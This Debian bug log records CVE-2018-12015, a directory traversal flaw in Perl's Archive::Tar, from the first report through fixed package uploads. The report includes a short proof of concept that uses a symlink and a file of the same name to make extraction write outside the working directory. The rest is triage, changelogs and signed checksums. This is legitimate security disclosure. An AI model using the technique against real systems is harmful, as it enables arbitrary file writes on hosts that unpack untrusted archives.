Debian Bug report logs -
#900834
perl: CVE-2018-12015: Archive::Tar: directory traversal
Reported by: Jakub Wilk <jwilk@jwilk.net>
Date: Tue, 5 Jun 2018 17:06:01 UTC
Severity: grave
Tags: confirmed, security, upstream
Found in versions perl/5.26.2-5, perl/5.24.1-1, perl/5.28.0~rc2-1, perl/5.20.2-1
Fixed in versions perl/5.26.2-6, perl/5.20.2-3+deb8u11, perl/5.24.1-3+deb9u4, perl/5.28.0-1
Done: Niko Tyni <ntyni@debian.org>
Bug is archived. No further changes may be made.
Forwarded to https://rt.cpan.org/Public/Bug/Display.html?id=125523
Toggle useless messages
Report forwarded
to debian-bugs-dist@lists.debian.org, jwilk@jwilk.net, Niko Tyni <ntyni@debian.org>:
Bug#900834; Package src:perl.
(Tue, 05 Jun 2018 17:06:04 GMT) (full text, mbox, link).
Message #3 received at submit@bugs.debian.org (full text, mbox, reply):
[Message part 1 (text/plain, inline)]
Source: perl
Version: 5.26.2-5
Tags: security
By default, the Archive::Tar module doesn't allow extracting files
outside the current working directory. However, you can bypass this
secure extraction mode easily by putting a symlink and a regular file
with the same name into the tarball.
I've attached proof of concept tarball, which makes Archive::Tar create
/tmp/moo, regardless of what the current working directory is:
$ tar -tvvf traversal.tar.gz
lrwxrwxrwx root/root 0 2018-06-05 18:55 moo -> /tmp/moo
-rw-r--r-- root/root 4 2018-06-05 18:55 moo
$ pwd
/home/jwilk
$ ls /tmp/moo
ls: cannot access '/tmp/moo': No such file or directory
$ perl -MArchive::Tar -e 'Archive::Tar->extract_archive("traversal.tar.gz")'
$ ls /tmp/moo
/tmp/moo
--
Jakub Wilk
[traversal.tar.gz (application/gzip, attachment)]
Added tag(s) confirmed and upstream.
Request was from Dominic Hargreaves <dom@earth.li>
to control@bugs.debian.org.
(Tue, 05 Jun 2018 22:06:08 GMT) (full text, mbox, link).
Marked as found in versions perl/5.24.1-1.
Request was from Salvatore Bonaccorso <carnil@debian.org>
to control@bugs.debian.org.
(Wed, 06 Jun 2018 04:57:02 GMT) (full text, mbox, link).
Marked as found in versions perl/5.20.2-1.
Request was from Salvatore Bonaccorso <carnil@debian.org>
to control@bugs.debian.org.
(Wed, 06 Jun 2018 05:00:03 GMT) (full text, mbox, link).
Changed Bug title to 'perl: CVE-2018-12015: Archive::Tar: directory traversal' from 'perl: Archive::Tar: directory traversal'.
Request was from Salvatore Bonaccorso <carnil@debian.org>
to control@bugs.debian.org.
(Thu, 07 Jun 2018 13:15:05 GMT) (full text, mbox, link).
Severity set to 'grave' from 'normal'
Request was from Dominic Hargreaves <dom@earth.li>
to control@bugs.debian.org.
(Fri, 08 Jun 2018 09:45:13 GMT) (full text, mbox, link).
Marked as found in versions perl/5.28.0~rc2-1.
Request was from Dominic Hargreaves <dom@earth.li>
to control@bugs.debian.org.
(Sat, 09 Jun 2018 14:30:02 GMT) (full text, mbox, link).
Reply sent
to Dominic Hargreaves <dom@earth.li>:
You have taken responsibility.
(Sat, 09 Jun 2018 15:12:03 GMT) (full text, mbox, link).
Notification sent
to Jakub Wilk <jwilk@jwilk.net>:
Bug acknowledged by developer.
(Sat, 09 Jun 2018 15:12:03 GMT) (full text, mbox, link).
Message #22 received at 900834-close@bugs.debian.org (full text, mbox, reply):
Source: perl
Source-Version: 5.26.2-6
We believe that the bug you reported is fixed in the latest version of
perl, which is due to be installed in the Debian FTP archive.
A summary of the changes between this version and the previous one is
attached.
Thank you for reporting the bug, which will now be closed. If you
have further comments please address them to 900834@bugs.debian.org,
and the maintainer will reopen the bug report if appropriate.
Debian distribution maintenance software
pp.
Dominic Hargreaves <dom@earth.li> (supplier of updated perl package)
(This message was generated automatically at their request; if you
believe that there is a problem with it please contact the archive
administrators by mailing ftpmaster@ftp-master.debian.org)
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256
Format: 1.8
Date: Sat, 09 Jun 2018 13:38:44 +0100
Source: perl
Binary: perl-base perl-doc perl-debug libperl5.26 libperl-dev perl-modules-5.26 perl
Architecture: source
Version: 5.26.2-6
Distribution: unstable
Urgency: high
Maintainer: Niko Tyni <ntyni@debian.org>
Changed-By: Dominic Hargreaves <dom@earth.li>
Description:
libperl-dev - Perl library: development files
libperl5.26 - shared Perl library
perl - Larry Wall's Practical Extraction and Report Language
perl-base - minimal Perl system
perl-debug - debug-enabled Perl interpreter
perl-doc - Perl documentation
perl-modules-5.26 - Core Perl modules
Closes: 900834
Changes:
perl (5.26.2-6) unstable; urgency=high
.
* [SECURITY] CVE-2018-12015: fix directory traversal vulnerability
in Archive-Tar (Closes: #900834)
Checksums-Sha1:
04a71eff631df54db5286fcbac58fc1ad7977c1d 2776 perl_5.26.2-6.dsc
ebfd67b4bc36c0f89ed8a35af1a7cc5da76db7d3 167332 perl_5.26.2-6.debian.tar.xz
9f080dfd0f0864a9c1e4df57f13f8433735e1186 5184 perl_5.26.2-6_source.buildinfo
Checksums-Sha256:
8441ca46715247218cbc19cabd15126f4fbacd544b6ce6446ea7b2ba2541f16a 2776 perl_5.26.2-6.dsc
6b3a39b03e80498d7e0d02c544aa24d4d9fdfc4afd85a91375aa2685d882d178 167332 perl_5.26.2-6.debian.tar.xz
fd71e724ea48b4828c48af7104453780dc188328bcadeb7cf9593550bb14972f 5184 perl_5.26.2-6_source.buildinfo
Files:
99abfe79c6f0498735dc71dcdaf79714 2776 perl standard perl_5.26.2-6.dsc
87a276b0bb1e43151a0e6490f130b22d 167332 perl standard perl_5.26.2-6.debian.tar.xz
cb2a35df5f798150482b957eb6eeedf7 5184 perl standard perl_5.26.2-6_source.buildinfo
-----BEGIN PGP SIGNATURE-----
iQJBBAEBCAArFiEEy0llJ/kAnyscGnbawAV+cU1pT7IFAlsb3zUNHGRvbUBlYXJ0
aC5saQAKCRDABX5xTWlPstsOD/9zRnfCTFseLXuoSG2rVhRTuKagm234vLJ0LXTY
Y0g2Ol7Ayw8ABgyifYWqJDFs3WL70xWKdB3eLYsCSQD6jOPbSoTK1UjsavxD7tFG
bk72lVaDF8bSam/KEBIH67Ysb5/Y1tfBz3aWVE5z2fTOTbNDcph0cgvOfJ0SnU5h
3PF1FnZBJ91jpW279AIlbv+s4JbQZXXt9eUiZKT6WZnX5dOoEYTPG1Ky/ttwZFXv
ZA6xlTe+pyTaKvlQHOnKv76i8vWm6geQNzYMTde/tUqWv2a72Oq/HTcb7PiBYT/7
0JsdN2rWgq1tpTqAQ51MSZM3RkOZlgzT+J43iO9mxat6okzgORbyqEPwABbKXopd
L90PdvWoapLQFjrx5mQgZV+nyO8WhLXOKWir0zpOAZ/CjOhh449GdJaLplGOn11u
IAp8POD4or67dZxRro1x7YdkTV8GX6vkhWtEcKr7CnTRCDeNhe9jD8QUSClqN+a/
G1dAo7gaOrEBSCwdyWOiSQmmZyFykWCOPjl3/HiHFaC5t8C+SP64Qc+U0UzTa28/
u8uvUZ0uekSt+KGScXVP7jsVt1i8AQP/xTCCynsCdmOYpiLoJ793FyG0+VB1lnYz
8uRnHqBqcdizIZMnXUWnfvxV0AGLzMB3RCQLOZhdD8tipnsSJIsOZ12eMPcYFC6H
gJCkzA==
=OI+z
-----END PGP SIGNATURE-----
Reply sent
to Dominic Hargreaves <dom@earth.li>:
You have taken responsibility.
(Tue, 12 Jun 2018 19:36:14 GMT) (full text, mbox, link).
Notification sent
to Jakub Wilk <jwilk@jwilk.net>:
Bug acknowledged by developer.
(Tue, 12 Jun 2018 19:36:14 GMT) (full text, mbox, link).
Message #27 received at 900834-close@bugs.debian.org (full text, mbox, reply):
Source: perl
Source-Version: 5.20.2-3+deb8u11
We believe that the bug you reported is fixed in the latest version of
perl, which is due to be installed in the Debian FTP archive.
A summary of the changes between this version and the previous one is
attached.
Thank you for reporting the bug, which will now be closed. If you
have further comments please address them to 900834@bugs.debian.org,
and the maintainer will reopen the bug report if appropriate.
Debian distribution maintenance software
pp.
Dominic Hargreaves <dom@earth.li> (supplier of updated perl package)
(This message was generated automatically at their request; if you
believe that there is a problem with it please contact the archive
administrators by mailing ftpmaster@ftp-master.debian.org)
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256
Format: 1.8
Date: Sun, 10 Jun 2018 18:40:37 +0100
Source: perl
Binary: perl-base perl-doc perl-debug libperl5.20 libperl-dev perl-modules perl
Architecture: all amd64 source
Version: 5.20.2-3+deb8u11
Distribution: jessie-security
Urgency: high
Maintainer: Niko Tyni <ntyni@debian.org>
Changed-By: Dominic Hargreaves <dom@earth.li>
Closes: 900834
Description:
libperl5.20 - shared Perl library
libperl-dev - Perl library: development files
perl-base - minimal Perl system
perl-debug - debug-enabled Perl interpreter
perl-doc - Perl documentation
perl - Larry Wall's Practical Extraction and Report Language
perl-modules - Core Perl modules
Changes:
perl (5.20.2-3+deb8u11) jessie-security; urgency=high
.
* [SECURITY] CVE-2018-12015: fix directory traversal vulnerability
in Archive-Tar (Closes: #900834)
Checksums-Sha1:
260b78682d66f64ff569e4e6822e1454b4a60bd8 2377 perl_5.20.2-3+deb8u11.dsc
4348cadb494865efac6dcd7389cccb6d5f4d33e8 157516 perl_5.20.2-3+deb8u11.debian.tar.xz
72c32508e322dfd1555013ce3ffba23ac418a3f2 5147 perl_5.20.2-3+deb8u11_source.buildinfo
0aeb49c28f19258d17f7a4f963b80fc98f5c6990 7346632 perl-doc_5.20.2-3+deb8u11_all.deb
fae1d268e75a3d4dbc4c2e6c50991db67f11ec88 2547456 perl-modules_5.20.2-3+deb8u11_all.deb
3010976f133222abbb1e08880bf72bd8620f97ec 1229672 perl-base_5.20.2-3+deb8u11_amd64.deb
a92d835f7a7bee9a800907b060f00c354ec7690e 4481682 perl-debug_5.20.2-3+deb8u11_amd64.deb
7a7b712bf3abcf5755bcb6faf462bed874bcd010 1362 libperl5.20_5.20.2-3+deb8u11_amd64.deb
94a97f170fc73b83cf9dfbd6ae9d0741fea2c95b 2147888 libperl-dev_5.20.2-3+deb8u11_amd64.deb
6db1773b7a6edcf6c0c9dbc54ba8921a4ec468cc 2642044 perl_5.20.2-3+deb8u11_amd64.deb
Checksums-Sha256:
b58df3f05201f9a474157fbf3ede9d4b08beb8b3b69a882bb2c3f14eb70c1a40 2377 perl_5.20.2-3+deb8u11.dsc
53e0ccd3ed238614fbcd8eb577159392892bcf82c7821f94f6ef379e8ae3a7c1 157516 perl_5.20.2-3+deb8u11.debian.tar.xz
c03a8c7af62d41cf1da5dd33c0dc109697a20900b7110a6fb4492f5bba20b2ac 5147 perl_5.20.2-3+deb8u11_source.buildinfo
c7e958ce7fb35fcb17792a130db54e21d4ea29e173eae2b509f899633d23e704 7346632 perl-doc_5.20.2-3+deb8u11_all.deb
22cb948fe3a60ff0bfdfc24aeebbf47fb0fee34fd3c68b9d10e4af76bb331ec9 2547456 perl-modules_5.20.2-3+deb8u11_all.deb
dcc2bcb06313ab37fc3ed9da253d39a516bf48245e60426eee4023ee1961e7e9 1229672 perl-base_5.20.2-3+deb8u11_amd64.deb
67196a8a0fa2be987f874d9c8e43b81d69c244a6d7f1170bb0c2a58c031453e0 4481682 perl-debug_5.20.2-3+deb8u11_amd64.deb
e80d6d17a10777854f14b1fb40eea74558c1a2974cb52c13c750d0b3e90cca02 1362 libperl5.20_5.20.2-3+deb8u11_amd64.deb
c77acfe009897647825b46324670ebbb7f391f2a49cb7c82429dd6cb4dd64585 2147888 libperl-dev_5.20.2-3+deb8u11_amd64.deb
bf2d580fea43dd9680d1d8706c8d2330ebbac07905f619a5ed546045d2a71c09 2642044 perl_5.20.2-3+deb8u11_amd64.deb
Files:
19957ef3cf7a45d31b5dd1df826af9d6 2377 perl standard perl_5.20.2-3+deb8u11.dsc
7340e4dcd6e352c3ec4060f88c3671fe 157516 perl standard perl_5.20.2-3+deb8u11.debian.tar.xz
d9e687773fc5037046997916c75738e8 5147 perl standard perl_5.20.2-3+deb8u11_source.buildinfo
2f906f8d86d367e54f86e3d5be6b32c5 7346632 doc optional perl-doc_5.20.2-3+deb8u11_all.deb
23a65d50552be175e0d747872f5e81b8 2547456 perl standard perl-modules_5.20.2-3+deb8u11_all.deb
bd3165838cff015d4f5b36fdeb0552e5 1229672 perl required perl-base_5.20.2-3+deb8u11_amd64.deb
e465128ea170fad325de91443849b398 4481682 debug extra perl-debug_5.20.2-3+deb8u11_amd64.deb
b8db73d0f81ccad412aa6214abd2e925 1362 libs optional libperl5.20_5.20.2-3+deb8u11_amd64.deb
0fc5aad2a417c405283921486c28aeea 2147888 libdevel optional libperl-dev_5.20.2-3+deb8u11_amd64.deb
7b9fa8e72618a1085a0870f98b9c6eca 2642044 perl standard perl_5.20.2-3+deb8u11_amd64.deb
-----BEGIN PGP SIGNATURE-----
iQJBBAEBCAArFiEEy0llJ/kAnyscGnbawAV+cU1pT7IFAlsdctsNHGRvbUBlYXJ0
aC5saQAKCRDABX5xTWlPsuCED/98MxFFupaH/s9mb7CxOMtv3/whh/I9OT9l38gW
9x95YIeAPbzVoh5HcwbYUm3fsEkQCIIv6rVVBggFMMm0bILgIfNPAA80xkqFGD98
0HWx662zKXhZbhuR/5ZEK6peiSXZGvN49e4kOU94GQ8dp/H2Os3LZfCHHrCSnCKp
R9yy5g3z+l/mw5v5f6RJVlaCjbvMIgcX/u2YqF0jGPj1kFJCnYknS/rZQZYcLIs8
r/ziIjqL4E1uqPSvEOLAs5eQ2HMircihvIywPxtm6rbnlinadcvkl3ZwGx/r6z90
0D5er3MLFr67FSg+ENdxBtT8nKUdgdJvaABC30RruIWNWvf4G77aYOM+rIdbsch9
+5Mjm7OD0A2wIaHnXbo5CrpjJcQ2eTvwkY9bj8wCmXgysmLaG6/3tbTnJF/CTBSv
+SyXt/F8GTDxKLiZ4I4irbOpASUjQ7rsdGy+x7zsritSemG7v7vrqXqHDdPSAa11
K+JCJb+tl34Hh+InzkrGNhRWWBBdxq/+wmStfbcHftS7gCGqjxAc7bWmNnEiv/zy
7zWNnJ+UHTIJ7Dp5pLcrNeTCBTDMWJAqblfYjRfh5gWln2RlA97mPh4yi9Lv9zb2
3HBmNEyGZP3hM8ADYNzVzwoE0YeiGrJI8jq6yw9+rMfrng0ImkgezVBRT32noqq+
9Xtjfw==
=hrqL
-----END PGP SIGNATURE-----
Reply sent
to Dominic Hargreaves <dom@earth.li>:
You have taken responsibility.
(Tue, 12 Jun 2018 22:06:22 GMT) (full text, mbox, link).
Notification sent
to Jakub Wilk <jwilk@jwilk.net>:
Bug acknowledged by developer.
(Tue, 12 Jun 2018 22:06:22 GMT) (full text, mbox, link).
Message #32 received at 900834-close@bugs.debian.org (full text, mbox, reply):
Source: perl
Source-Version: 5.24.1-3+deb9u4
We believe that the bug you reported is fixed in the latest version of
perl, which is due to be installed in the Debian FTP archive.
A summary of the changes between this version and the previous one is
attached.
Thank you for reporting the bug, which will now be closed. If you
have further comments please address them to 900834@bugs.debian.org,
and the maintainer will reopen the bug report if appropriate.
Debian distribution maintenance software
pp.
Dominic Hargreaves <dom@earth.li> (supplier of updated perl package)
(This message was generated automatically at their request; if you
believe that there is a problem with it please contact the archive
administrators by mailing ftpmaster@ftp-master.debian.org)
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256
Format: 1.8
Date: Sun, 10 Jun 2018 18:37:28 +0100
Source: perl
Binary: perl-base perl-doc perl-debug libperl5.24 libperl-dev perl-modules-5.24 perl
Architecture: all amd64 source
Version: 5.24.1-3+deb9u4
Distribution: stretch-security
Urgency: high
Maintainer: Niko Tyni <ntyni@debian.org>
Changed-By: Dominic Hargreaves <dom@earth.li>
Closes: 900834
Description:
libperl5.24 - shared Perl library
libperl-dev - Perl library: development files
perl-base - minimal Perl system
perl-debug - debug-enabled Perl interpreter
perl-doc - Perl documentation
perl - Larry Wall's Practical Extraction and Report Language
perl-modules-5.24 - Core Perl modules
Changes:
perl (5.24.1-3+deb9u4) stretch-security; urgency=high
.
* [SECURITY] CVE-2018-12015: fix directory traversal vulnerability
in Archive-Tar (Closes: #900834)
Checksums-Sha1:
af207347626b1c7c67cfe3694c41500627f82f2c 2393 perl_5.24.1-3+deb9u4.dsc
8b880f01eb868807f669bbc37306b435aeb0fcae 179936 perl_5.24.1-3+deb9u4.debian.tar.xz
efad4d938b9da447909ada8dba9cb509365b69e2 5148 perl_5.24.1-3+deb9u4_source.buildinfo
9d1bcc0c28b32f4e876951a9f0cd08246b5aa5b5 2755282 libperl-dev_5.24.1-3+deb9u4_amd64.deb
735e87412d5cdf6927b302a7245aff00c53b1a62 3522222 libperl5.24_5.24.1-3+deb9u4_amd64.deb
32d7f11f6b90ff202e9a708bda4a7189b39432c7 1344606 perl-base_5.24.1-3+deb9u4_amd64.deb
3eaa55757469bf8d8568391950eb552cd88e8521 6654658 perl-debug_5.24.1-3+deb9u4_amd64.deb
632d982fcdda3d6e65991a75a9fcab4512305c95 7145986 perl-doc_5.24.1-3+deb9u4_all.deb
6daa8b346fdc5377af1b34ba2a221fc756939fe4 2723830 perl-modules-5.24_5.24.1-3+deb9u4_all.deb
a36604cb1399c2afddc5a34f502cffff9e7eca0b 5787 perl_5.24.1-3+deb9u4_amd64.buildinfo
26714cb0a97ff01c13b3802f2ec86ce44163dac7 218478 perl_5.24.1-3+deb9u4_amd64.deb
Checksums-Sha256:
439fd400e8f7659679acac82bb6178c33e1c7cea161210c5051f8c78c2df004b 2393 perl_5.24.1-3+deb9u4.dsc
96b1e96a4ac72bb937f53079806fe0d6127da8fbf40d113d618a240aa378745c 179936 perl_5.24.1-3+deb9u4.debian.tar.xz
3395fefebdc09d87a3b0a5ac5b4b0039ff803d43fd686fa19ba7473688e099fe 5148 perl_5.24.1-3+deb9u4_source.buildinfo
0321c89a988bb0f1430a92943fa1c83e907c74e86b81021b422af34a24a7212c 2755282 libperl-dev_5.24.1-3+deb9u4_amd64.deb
e010ab8e7178c2271033aa199f925f1c2fd46e879d222462eaad35d1f7eaedea 3522222 libperl5.24_5.24.1-3+deb9u4_amd64.deb
914985af488a14268b911de8b06e082165f362e3d3c6a52581aa2619d557e1ea 1344606 perl-base_5.24.1-3+deb9u4_amd64.deb
02e3eb8c853e5caa558512ed6d48d0dcdb9d99692585ebd77fd22ddb62234f91 6654658 perl-debug_5.24.1-3+deb9u4_amd64.deb
a483bc64c3936ce99b3ae76430d644c3c784f879819ef49d74f0d4365b4c3020 7145986 perl-doc_5.24.1-3+deb9u4_all.deb
97ef07235d452887148df4791b24d50af224bebd47e90970d3b26eead718c330 2723830 perl-modules-5.24_5.24.1-3+deb9u4_all.deb
485ed8287ff61c4d1d855c55ca4801cda41106ef9c207411cc62a51a73b26945 5787 perl_5.24.1-3+deb9u4_amd64.buildinfo
9f9829e5a44de48877a8ff172cf1c25aefb2dc23ee8cd508dea7d8a877d4ff30 218478 perl_5.24.1-3+deb9u4_amd64.deb
Files:
45d7c95ff04ee4a8300fdc8515789136 2393 perl standard perl_5.24.1-3+deb9u4.dsc
ab7a46240a333c6891ec737d97a57f3b 179936 perl standard perl_5.24.1-3+deb9u4.debian.tar.xz
bca10b7f8812b1277e723c10c6abb015 5148 perl standard perl_5.24.1-3+deb9u4_source.buildinfo
ba4de357e2e56f6ec5035f004c3a2441 2755282 libdevel optional libperl-dev_5.24.1-3+deb9u4_amd64.deb
09b2d8a4fc06cd455f9937109738be42 3522222 libs optional libperl5.24_5.24.1-3+deb9u4_amd64.deb
50f96a0c7220ef449601b4ac1605ea89 1344606 perl required perl-base_5.24.1-3+deb9u4_amd64.deb
45fa6e304b63e60afc38184266ae76b5 6654658 devel extra perl-debug_5.24.1-3+deb9u4_amd64.deb
65a2e7562defc2f3aa8fa75d7d761e63 7145986 doc optional perl-doc_5.24.1-3+deb9u4_all.deb
9c5837ae2d97e0ae837a6469472b9c4a 2723830 perl standard perl-modules-5.24_5.24.1-3+deb9u4_all.deb
36e7f2b306ed5f05c17d5562e9b0dba2 5787 perl standard perl_5.24.1-3+deb9u4_amd64.buildinfo
1937c69554f677fb5781f5922d22b6a1 218478 perl standard perl_5.24.1-3+deb9u4_amd64.deb
-----BEGIN PGP SIGNATURE-----
iQJBBAEBCAArFiEEy0llJ/kAnyscGnbawAV+cU1pT7IFAlsdai4NHGRvbUBlYXJ0
aC5saQAKCRDABX5xTWlPsldSEACJEFQ4rwkJAS5js3R8XBMhfidxVUGYOkB2jGnk
EFte7lFzVeFk40qPj7hMbGOl5SRyPoBwTwTFu8qdvmwcO05WsP7eIUHeJ5PfAlSm
B1xt7yohK3FkUNT7BEw7fC/6N1exi37JaUg7/N4LcYf5Cyy7Fmn5x909JprU3a8Z
Tk/PBvnhv8pDczK7nPhUdiO60UwXFP7EHbKwnc9UPrCCzFD+0639D0xJOUhqAFoc
sNKNsUbxy/wb1i5PHwsDblIXSAcmUQN/EwWD64UeV5dx/HRlQ8KjH9uVDpg9Wlj4
hSjR6zD6V9YJ5nlr7vdjNFFMyWznHyibOy57iK4O/S1JmxiWo6UUkdERqOD29Uvx
12pUMa0oVHxr/OITc4ZcUbAyzKVdXDKEu5TSPjyvidMHRkVQTybMdfDpTgH3i1k7
LPjrvPKBZrJZmj52RnHQ7pRX8kJoueMS3YoJIrbxHelkGEi33F6njza3lTwLR2xX
Th4Lst8sX0arCK5szpUBpBVJgJA+Ho2dUNvp5Ae2XD/rAfTTZKiYtnUrOFS02xSC
N13F8xIW43qxYR0OS6u7IYWB/BO60WMP3q4BJCdrMUIqBNDVQ3+f8WVJg/auCXLy
lGXCcpuOl0LAetfobn/O9TMoqXcFvZoV1OWfOqMAl/DjghPPtDeQ+Y38iFmcpeY8
8ynVBw==
=0Ojb
-----END PGP SIGNATURE-----
Reply sent
to Niko Tyni <ntyni@debian.org>:
You have taken responsibility.
(Tue, 26 Jun 2018 08:21:03 GMT) (full text, mbox, link).
Notification sent
to Jakub Wilk <jwilk@jwilk.net>:
Bug acknowledged by developer.
(Tue, 26 Jun 2018 08:21:04 GMT) (full text, mbox, link).
Message #37 received at 900834-close@bugs.debian.org (full text, mbox, reply):
Source: perl
Source-Version: 5.28.0-1
We believe that the bug you reported is fixed in the latest version of
perl, which is due to be installed in the Debian FTP archive.
A summary of the changes between this version and the previous one is
attached.
Thank you for reporting the bug, which will now be closed. If you
have further comments please address them to 900834@bugs.debian.org,
and the maintainer will reopen the bug report if appropriate.
Debian distribution maintenance software
pp.
Niko Tyni <ntyni@debian.org> (supplier of updated perl package)
(This message was generated automatically at their request; if you
believe that there is a problem with it please contact the archive
administrators by mailing ftpmaster@ftp-master.debian.org)
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256
Format: 1.8
Date: Mon, 25 Jun 2018 22:20:16 +0300
Source: perl
Binary: perl-base perl-doc perl-debug libperl5.28 libperl-dev perl-modules-5.28 perl
Architecture: source
Version: 5.28.0-1
Distribution: experimental
Urgency: medium
Maintainer: Niko Tyni <ntyni@debian.org>
Changed-By: Niko Tyni <ntyni@debian.org>
Description:
libperl-dev - Perl library: development files
libperl5.28 - shared Perl library
perl - Larry Wall's Practical Extraction and Report Language
perl-base - minimal Perl system
perl-debug - debug-enabled Perl interpreter
perl-doc - Perl documentation
perl-modules-5.28 - Core Perl modules
Closes: 900834
Changes:
perl (5.28.0-1) experimental; urgency=medium
.
[ Dominic Hargreaves ]
* Merge 5.26.2-6 from unstable
- [SECURITY] CVE-2018-12015: fix directory traversal vulnerability
in Archive-Tar (Closes: #900834)
.
[ Niko Tyni ]
* Add an autopkgtest check that trivially embeds Perl in C.
* Import new upstream major release.
Checksums-Sha1:
4de68cb29e14d3fd4bb4df4a6bbc6c8c01671d6b 2810 perl_5.28.0-1.dsc
21339f5f1bcacbaed5cdfe97368eacbc5e55da35 411944 perl_5.28.0.orig-regen-configure.tar.xz
c0e9e7a0dea97ec9816687d865fd461a99ef185c 12410536 perl_5.28.0.orig.tar.xz
f69e2f6d929af8f8509857a8462373ababe05033 158260 perl_5.28.0-1.debian.tar.xz
66ccc15f8cdb38e2b3ad50d2e94de64cf2a6a3ae 4729 perl_5.28.0-1_source.buildinfo
Checksums-Sha256:
226d942fbe976325a81bdd7e870dd24788abdf8c13dd372624eb3522e16095be 2810 perl_5.28.0-1.dsc
5873b81af4514d3910ab1a8267b15ff8c0e2100dbae4edfd10b65ef72cd31ef8 411944 perl_5.28.0.orig-regen-configure.tar.xz
059b3cb69970d8c8c5964caced0335b4af34ac990c8e61f7e3f90cd1c2d11e49 12410536 perl_5.28.0.orig.tar.xz
a587795bbaaec31d0dbfa84b2d2f130bc47d8926823de8afb5141904df892a61 158260 perl_5.28.0-1.debian.tar.xz
c000ae91b48aeb9923ae38398ab8b2e6e8a9c4368d3b6c7bf4f77498ed3f1f29 4729 perl_5.28.0-1_source.buildinfo
Files:
7148eff8c8fbf5f8410b3ac475cd435e 2810 perl standard perl_5.28.0-1.dsc
fbf2e774fdcc55c92afe713db38e5e25 411944 perl standard perl_5.28.0.orig-regen-configure.tar.xz
f3245183c0a08f65e94a3333995af08e 12410536 perl standard perl_5.28.0.orig.tar.xz
433f0df9d2640f50ee6a801c03f11d4c 158260 perl standard perl_5.28.0-1.debian.tar.xz
d89e67cbcff53286c4ed087c4aefc229 4729 perl standard perl_5.28.0-1_source.buildinfo
-----BEGIN PGP SIGNATURE-----
iQJFBAEBCAAvFiEEdqKOQsmBHZHoj7peLsD/s7cwGx8FAlsx6q4RHG50eW5pQGRl
Ymlhbi5vcmcACgkQLsD/s7cwGx8QHRAAw2TmhU/MC8l+aMkt0xCzyTi1FV9xwzDV
3cfU3Zx7voqdosOjUCFRaHoAj4ZhjRKPuMCqZJQXcz1E5UAhGL0nGEx9h01WAs57
1Y+PT8pToUc+9gEvl4ySEvpOL2ow1r+qSOW74I9zqDO4W+zIORTPQB+ZrOzcoykk
v8n4LlqhxkCtcyBYt+O/GycE1Bcw5A22hteSc3Hhe0tJ/hN8qzunftpvLNcYP6qG
WtJACE20NtafR7W5YJOltZPLPtlCkVqWDjzpV74+iCBjwuTb2jY+0QCGoeqDOWAM
xOdjMHVumCSuE0AqjCyUrhJXmfhVaxZHy9TtEUongTJQQmdRK591QI3ryPslw3Fi
eC2NXEnrceZ7SAfnSQ2abF11og9ubBWpKwm5p6N22lJEiUR+x8xkV7bgk8LEvn3T
kBZpHj4vHSNCcwdyrHakhPz+dgmo5A9OMX6Ni4ZPjexlB5IvpcElo4E0+D/61ueT
pZODvpP8hzR+YnHjdotnvwp/gx8NqiMcejWqOula1coPdtveaaNj3v1FLNGE9joU
vLqCc5yc7jLbInUb1F0CrMcxGZP0czZTQvYtJ+qQWamhLE397asrkjKPvpmQ31D9
yUnUJiLozfkmVFZuyE+oBgJpHjdGWL8fDcgBFTO/iSexhZyf+LagGnk4hLMUxabu
WWVIVjTU9Pg=
=Qe4Q
-----END PGP SIGNATURE-----
Bug archived.
Request was from Debbugs Internal Request <owner@bugs.debian.org>
to internal_control@bugs.debian.org.
(Mon, 06 Aug 2018 07:30:08 GMT) (full text, mbox, link).
Send a report that this bug log contains spam.
Debian bug tracking system administrator <owner@bugs.debian.org>.
Last modified:
Wed Jun 19 17:20:48 2019;
Machine Name:
buxtehude
Debian Bug tracking system
Debbugs is free software and licensed under the terms of the GNU
Public License version 2. The current version can be obtained
from https://bugs.debian.org/debbugs-source/.
Copyright © 1999 Darren O. Benham,
1997,2003 nCipher Corporation Ltd,
1994-97 Ian Jackson,
2005-2017 Don Armstrong, and many other contributors.
Vulmon